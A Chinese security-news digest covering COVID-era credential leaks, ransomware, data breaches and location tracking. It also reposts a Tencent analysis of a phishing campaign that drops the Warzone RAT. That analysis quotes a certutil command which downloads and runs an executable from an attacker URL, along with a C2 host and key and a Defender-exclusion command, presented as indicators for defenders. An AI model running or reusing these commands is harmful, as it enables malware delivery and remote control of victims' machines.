据外媒报道，在当局处理像COVID-19这种威胁生命的疾病时，最糟糕的事情之一就是安全漏洞。而现在这样的事情已经发生，因为不明身份人士公布了近25000个电子邮件地址和密码，这些电子邮件地址和密码来自不同的组织，包括美国疾病控制与预防中心(CDC)、盖茨基金会、美国国立卫生研究院（NIH）、世界卫生组织（WHO）和世界银行。 目前还不清楚这些机构遭黑客入侵的时间，也不清楚谁对入侵事件和信息的传播负责，但结果还是令人担忧。其中一些密码仍然可以被用来访问电子邮件地址。监视网上极端主义和恐怖组织的SITE情报组告诉《华盛顿邮报》，这些电子邮件的登录信息在周日被共享。到了周一，这些邮件已经被极右极端分子用来进行黑客攻击和骚扰。 “新纳粹分子和白人至上主义者利用这些名单，在他们的活动场所中积极发布这些名单，”SITE的执行董事Rita Katz说。”极右极端分子利用这些数据，在分享新冠病毒大流行的阴谋论的同时，还呼吁开展骚扰运动。这些所谓的电子邮件凭证的分发只是整个极右分子长达数月的行动的另一个部分，目的是将COVID-19大流行病武器化。” 这些信息最初出现在4chan上，然后被转移到Pastebin上，然后又出现在Twitter和Telegram上的极右极端主义账户上。最大的一批电子邮件地址属于NIH（9938个），其次是CDC（6857个）、世界银行（5120个）和WHO（2732个）。 澳大利亚网络安全专家Robert Potter 表示，一些WHO的电子邮件地址和密码组合是真实的。”他们的密码安全性令人震惊，”Potter 说，关于泄露的WHO凭证，他说。”有48人用’密码’作为他们的密码。其他人用的是自己的名字或 ‘changeme’。”Potter表示，世卫组织的信息来自于2016年的一次黑客攻击。目前还不清楚其他凭证的来源，也不清楚是谁能够获得这些凭证。其中一些可能是从暗网购买的。 新纳粹组织一直在利用这些信息传播和助长COVID-19的阴谋论。有一个团体说，这些邮件地址的数据 “证实了SARS-COV-2实际上是人工合成的病毒”，这也是目前流传的新冠病毒阴谋论之一。世卫组织最近表示，这种新型冠状病毒是动物源性的，没有任何迹象表明COVID-19病毒是在实验室里合成的。   （稿源：cnBeta，封面源自网络。）

自新冠病毒疫情在美国蔓延以来，联邦调查局的网络犯罪投诉中心(IC3)接到的网络犯罪举报量激增，主要是因为美国国内和国际黑客试图在这个时间段进行各种网络攻击活动。 美国联邦调查局网络部副助理主任托尼娅·乌戈雷茨（Tonya Ugoretz）周四表示，IC3每天收到3000-4000起网络安全投诉，而在疫情爆发之前每天收到的投诉量维持在1000起左右。 本周四由Aspen Institute主办的网络研讨会上，乌戈雷茨表示：“我们的网络漏洞越来越多，也增加了威胁者利用这些漏洞的兴趣。” 乌戈雷茨表示许多黑客来自于那些“渴望深入了解”新冠肺炎相关研究的国家，而“远程工作的快速转变”已经为黑客提供了大量供他们利用的网络漏洞。 乌戈雷茨提到：“各国对有关病毒的信息非常感兴趣，例如关于疫苗的信息。我们的确发现有侦察活动，一些攻入那些机构的行为，尤其是那些公开表示自己在研究新冠肺炎的机构。” 乌戈雷茨称，研究潜在疗法或疫苗的机构公开宣传自己在做这件事情是合情合理的。但是她指出，“不好的一面是，这会让他们成为其他有兴趣搜集研究细节的国家的目标，这些国家甚至可能会窃取这些机构的知识产权信息。”她表示，FBI发现，这些由国家支持的黑客组织也试图攻入美国医疗保健系统。   （稿源：cnBeta，封面源自网络。）

据外媒报道，当地时间周二，一群美国民主党参议员对谷歌母公司Alphabet旗下的生命科学部门Verily进行了盘问”，内容是关于该公司的新冠筛查网站相关的隐私问题。据悉，该网站于两周前上线，让用户可以通过筛查看看自己是否应该去新冠病病毒检测站检测。 该套工具目前只对加州四个县的人开放，其由Verily的Project Baseline负责。 议员们对该网站是否符合《医疗保险可携性与责任法案(HIPAA)》提出了担忧。HIPAA是监管某些医疗信息的安全和隐私的联邦法律。参议员们还对该网站要求只有拥有谷歌账户才能进行筛查的规定提出了异议，实际上这一举动已经引起了隐私倡导者的密切关注。 参议员们在写给这家公司的CEO Andy Conrad的一封公开信中称：“随着公司在加州推进新冠病毒基准试点项目和测试筛查网站，解决这些关键的隐私问题至关重要。”这封信由新泽西州的Robert Menendez、加州的Kamala Harris、康涅狄格州的Richard Blumenthal、俄亥俄州的Sherrod Brown和新泽西州的Cory Booker联合签署。 对此，Verily并未立即回复记者的置评请求吧，不过这家公司必须要在4月6日之前回复这封信函。   （稿源：cnBeta,封面源自网络。）

上周六，某黑客论坛公布了包含 493 万 4863 乔治亚州居民的详细个人信息的数据库。在大小为 1.04 GB 的 Microsoft Access 数据库文件中，可查看到包括全名、家庭住址、出生日期、身份证编号、手机号码之类的隐私内容，甚至连已故公民的信息也没放过。 周末的时候，数据泄露监视和预防服务公司 Under The Breach 曝光了本次泄漏事件，并向外媒 ZDNet 分享了一些细节。 由快照可知，数据库包含了超过 490 万条记录，其中包含了数百万已故公民。根据 2019 年的人口普查，该州目前预估人口在 370 万左右。 目前尚不清楚黑客论坛中有多少访客已获取该数据库，数据泄露的源头也仍然是个谜。 在周日的报道中，ZDNet 认为可能源自该州的中央选举委员会（CEC）。然而在周一的一份声明中，该委员会已予以否认，因其通常并不会收集如此详尽的个人信息。 至于黑客论坛，其拒绝在致 ZDNet 的一份声明中透露他们是从何处获得数据的，但已排除了 CEC 的嫌疑。目前当地有关部门正在对此事展开深入的调查。   (稿源：cnBeta，封面源自网络。）

据外媒报道，据知情人士透露，美国疾病控制和预防中心(CDC)已与全美各州和地方政府合作，追踪人们的手机位置数据，借以研究新型冠状病毒的传播趋势。 知情人士表示，移动广告公司（而非手机运营商本身）始终在通过CDC向美国政府机构转发“某些地理上感兴趣的用户”的信息。显然，此举旨在帮助创建全国性的政府门户网站，并将使用多达500个城市的地理位置数据来监控疫情。 官员们辩称，这些信息已经被匿名化和汇总，可以帮助他们针对病毒的传播情况量身定做疫情应对措施，并使用某人驾车行驶里程或去过多少家商店等变量来预估疫情的经济影响。 政府机构的这种监测也可以充当提示，看人们是否遵守CDC保持安全距离的指导方针或官方的“就地避难”命令。例如，研究人员通过地理位置数据发现，尽管接到了警告通知，但仍有大批纽约人在参观布鲁克林展望公园，于是他们联系了警方。 虽然这些数据据称已经被去除了任何可识别的信息，但这仍然引发隐私权活动家的担忧。隐私研究人员沃尔菲·克里斯托(Wolfie Christl)表示，该行业正将其侵入性做法和产品作为共享元数据的借口。 克里斯托称：“由于疫情爆发，在某些情况下利用基于消费者数据的聚合分析可能是合适的，即使数据是由公司秘密或非法收集的。因为位置数据的真正匿名化几乎是不可能的，所以强有力的法律保障至关重要。” 尽管如此，针对这些移动广告商的法规还没有在现有隐私法中给与明确定义，特别是因为手机用户经常选择加入这些公司的跟踪措施，并与政府机构共享不包含任何可识别信息的数据。 不过，电信运营商需要遵守不同的规则，几家运营商指出，美国政府目前还没有向它们索要元数据。这可能是因为官员们正在从其他科技巨头那里寻求同样的信息，据称美国政府正在与Facebook、谷歌和其他科技公司进行“积极谈判”，以获取匿名的聚合数据，监控用户是否遵守了官方的健康法规。 世界各国政府已经开始实施类似的监测，以帮助做出应对疫情反应。据报道，意大利、德国和奥地利的电信公司已经承认与政府机构共享用户的地理位置数据。 上周，欧盟内部市场专员蒂埃里·布雷东(Thierry Breton)向该地区最大的电信公司施压，要求它们共享客户手机上的匿名元数据以跟踪病毒的传播情况，并利用这些信息对医疗用品进行分类。     （稿源：网易科技，封面源自网络。）  

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/TRY4-1aUf5gTLHOWQ7PWuQ   一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎(Covid-19)疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心（CDC）作为发件人，投递附带Office公式编辑器漏洞的文档至目标邮箱，收件人在存在Office公式编辑器漏洞（CVE-2017-11882）的电脑上打开文档，就可能触发漏洞下载商业远控木马Warzone RAT。 Warzone RAT是在网络上公开销售的商业木马软件，具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能，并且还可以在包括Win10在内的Windows系统上进行特权提升。 根据腾讯安全威胁情报中心数据，该病毒从3月23日开始传播，目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件，建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击，客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。 二、样本分析 攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知，将漏洞利用的DOC Word文件命名为COVID-19 – nCoV – Special Update.doc，引导收件人打开查看。 此时如果用户在没有安全防护软件，且使用没有修复CVE-2017-11882漏洞的Office打开此文档，就会触发漏洞中的恶意代码，然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为： CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe File.exe外壳程序采样C#编写，代码经过高度混淆，运行时经过两次解密在内存中Invoke执行最终的PE文件，该PE通过分析可确认为商业远控木马Warzone RAT。 Warzone RAT最早2018年在warzone[.]io上公开出现，目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能： 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级（包括最新的Win10系统） 远程开启摄像头 盗取浏览器密码（Chrome，Firefox，IE，Edge，Outlook，Thunderbird，Foxmail） 下载、执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接 三、窃密 Warzone RAT木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。 获取保存在IE浏览器中的账号密码信息。 获取OutLook邮箱中的账号密码信息。 获取Thunderbird邮箱中的账号密码信息。 获取Firefo浏览器中的账号密码信息。 四、特权提升 如果Warzone RAT以提升的特权运行，则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中： powershell Add-MpPreference -ExclusionPath 对于Windows 10以下的版本，使用存储在其资源WM_DSP中的模块进行UAC绕过。 该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。 对于Windows 10则利用sdclt.exe 的权限自动提升功能，该功能在Windows备份和还原机制的上下文中使用。 五、远程控制 解密出C2地址：phantom101.duckdns.org:5200，与该地址建立连接成为受控机，使电脑完全被黑客控制。 与服务器进行TCP通信，传输数据使用RC4加密算法加密，密钥为”warzone160”。 与控制端通信的部分协议命令和含义如下： C&C 操作 2 枚举进程信息 4 枚举磁盘信息 6 枚举文件 8 读取文件 10 删除文件 12 杀死进程 14 远程Shell 20 开启摄像头 26 卸载木马 28 上传文件 32 从浏览器获取密码 34 下载并执行程序 36 键盘记录(在线) 38 键盘记录(离线) 40 RDP 42 建立反向连接 44 反向连接断开 48 Socket设置 58 执行文件 60 读取日志 六、安全建议 1、建议不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描； 2、安装CVE-2017-11882漏洞补丁：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器： reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-0000 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400 4、企业网管，可以设置拦截以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com 5、推荐企业用户部署腾讯T-Sec高级威胁检测系统（腾讯御界）对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统，是基于腾讯安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统，该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接：https://cloud.tencent.com/product/nta 6、企业终端系统保护 终端电脑可部署腾讯T-Sec终端安全管理系统（御点）拦截病毒木马攻击，更多信息参考链接：https://s.tencent.com/product/yd/index.html。 IOCs C&C phantom101.duckdns.org:5200 MD5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http://getegroup.com/file.exe 参考链接 https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

美国国土安全部网络安全和基础设施安全署的公告显示，有一家未公开名字的天然气公司在感染勒索软件后关闭设施两天。感染发生在该公司的天然气压缩设施，攻击始于钓鱼邮件内的恶意链接。 攻击者从其 IT 网络渗透到作业 OT 网络，其 IT 和 OT 网络都被勒索软件感染。感染没有扩散到控制压缩设备的可编程逻辑控制器，因此该公司没有失去对操作设施的控制。工作人员关闭了压缩设施两天，但由于管道传输的依赖性，它的关闭连带影响到了其它地方的压缩设施。   （稿源：solidot，封面源自网络。）

上周五，美国五角大楼、联邦调查局和国土安全部，联合发布了有关朝鲜发起的黑客攻击事件的技术细节。其中谈到了七种恶意软件，涉及网络钓鱼和远程访问，以及所谓的非法活动、窃取资金和逃避制裁。在 @CNMF_VirusAlert 发布的推特帖子中，还附上了有关详情的链接。 链接到 VirusTotal 的帖子，公布了有关散列密码、文件名和其它技术详情，可帮助防御者识别其内部网络威胁。 美国土安全部下设网络安全和基础设施安全局（IEA）的咨询顾问称，行动背后有着 Hidden Cobra 的身影，美方怀疑该黑客组织与朝鲜政府有关。 本次曝光的七款恶意软件，有六个都被上传到了 VirusTotal，包括： Bistromath：功能齐全的远程访问木马和植入程序，可执行系统调查、文件上传和下载、处理和命令执行，以及对麦克风、剪贴板和屏幕的监视。 Slickshoes：一种信标植入手段，可加载但不执行，能够辅助 Bistromath 实现诸多功能。 Hotcroissant：一种功能齐全的信标植入手段，可实现上文列出的诸多相同功能。 Artfulpie：可从硬编码的网址执行 DLL 文件的下载，在内存中加载和执行植入程序。 Buttetline：另一种功能完备的植入手段，使用伪造的 HTTPS 方案和经过修改的 RC4 加密密码来保持隐身状态。 Crowdedflounder：一个 Windows 可执行文件，旨在将远程访问木马解压到计算机内存中并执行。 Cyberscoop 指出：上周五的行动，标志着美国网络司令部首次认定了朝方的黑客行动。促成这一点的其中一个原因，是攻击的复杂性已变得越来越高。 包括路透社在内的多家新闻机构，均援引过去年八月的联合国报告，预估朝方黑客针对金融机构和加密货币交易攻击的获利高达 20 亿美元。   (稿源：cnBeta，封面源自网络。）

1月31日，美国威斯康星州的拉辛市被勒索软件入侵，事件发生后，该市大部分计算机系统瘫痪。 该地政府科技网站发布报告称：本市的计算机网络系统周五被勒索软件入侵，至周日下午网络系统仍处于瘫痪状态。目前，该市的网站、电子邮件以及在线支付系统都收到影响。拉辛警方发布Facebook，称其目前无法支付事件的处理费用，也无法提供事件的侦测报告。 周五，该市的信息管理部门开启了事件响应程序，地方当局以及联邦政府对事件展开调查，调查声称税收以及911公共安全系统未受这次勒索软件入侵影响。 鲍威尔在一份声明中称：MIS worked over the weekend 公司联合网络安全公司制作了一个周密的计划，在不传播勒索软件的情况下恢复网络系统，目前对事件发生原因以及波及范围都在进行调查。 去年12月，Maze勒索软件运营商发布消息，称其利用勒索软件盗取彭萨科拉市的2GB文件。 去年11月，路易斯安那周政府遭到勒索软件攻击，多州的服务机构包括机动车管理局、卫生部以及运输发展部都受到影响。这一事件使得路易斯安那州关闭了该州的几个网站以及邮件和互联网服务。 8月份，近23个地方政府遭受勒索软件攻击，佛罗里达州的一些城市也受到黑客影响。去年6月，佛罗里达州被勒索软件攻击系统，里维埃拉海滩城同意支付60万美元的赎金来解密其数据。几天后，莱克城也同意支付近50万美元的赎金机密遭勒索软件攻击系统。   消息来源：securityaffairs， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

为美国低收入家庭提供的智能手机近日被发现存在恶意程序，更严重的是无法在不影响手机正常工作的情况下，清除该恶意程序。援引Malwarebytes Labs本周三公布的博文，详细披露了预装在UMX U686CL手机中的恶意程序。这是一款由美国政府生命线救援项目牵头，并由Assurance Wireless提供的一款廉价Android手机。 博文中称，这款低端Android手机上存在两款恶意程序，而且都是通过预装方式直接嵌入到系统代码中的。尽管其中一款恶意程序可以被移除，但是需要繁琐的步骤并需要阻止未来的版本更新；而另一个恶意程序将其自身硬编码到设置应用中，意味着如果将其删除会导致手机无法使用。 Assurance Wireless的母公司Sprint在随后提交的声明中，表示这两款程序并不应该归类为恶意程序。公司在本周五提交的声明中写道：“我们已经发现了这个问题，并接触了设备厂商Unimax来了解根本原因。但是经过我们的初步测试，我们认为媒体描述的这两款应用程序是恶意程序。”   （稿源：cnBeta，封面源自网络。）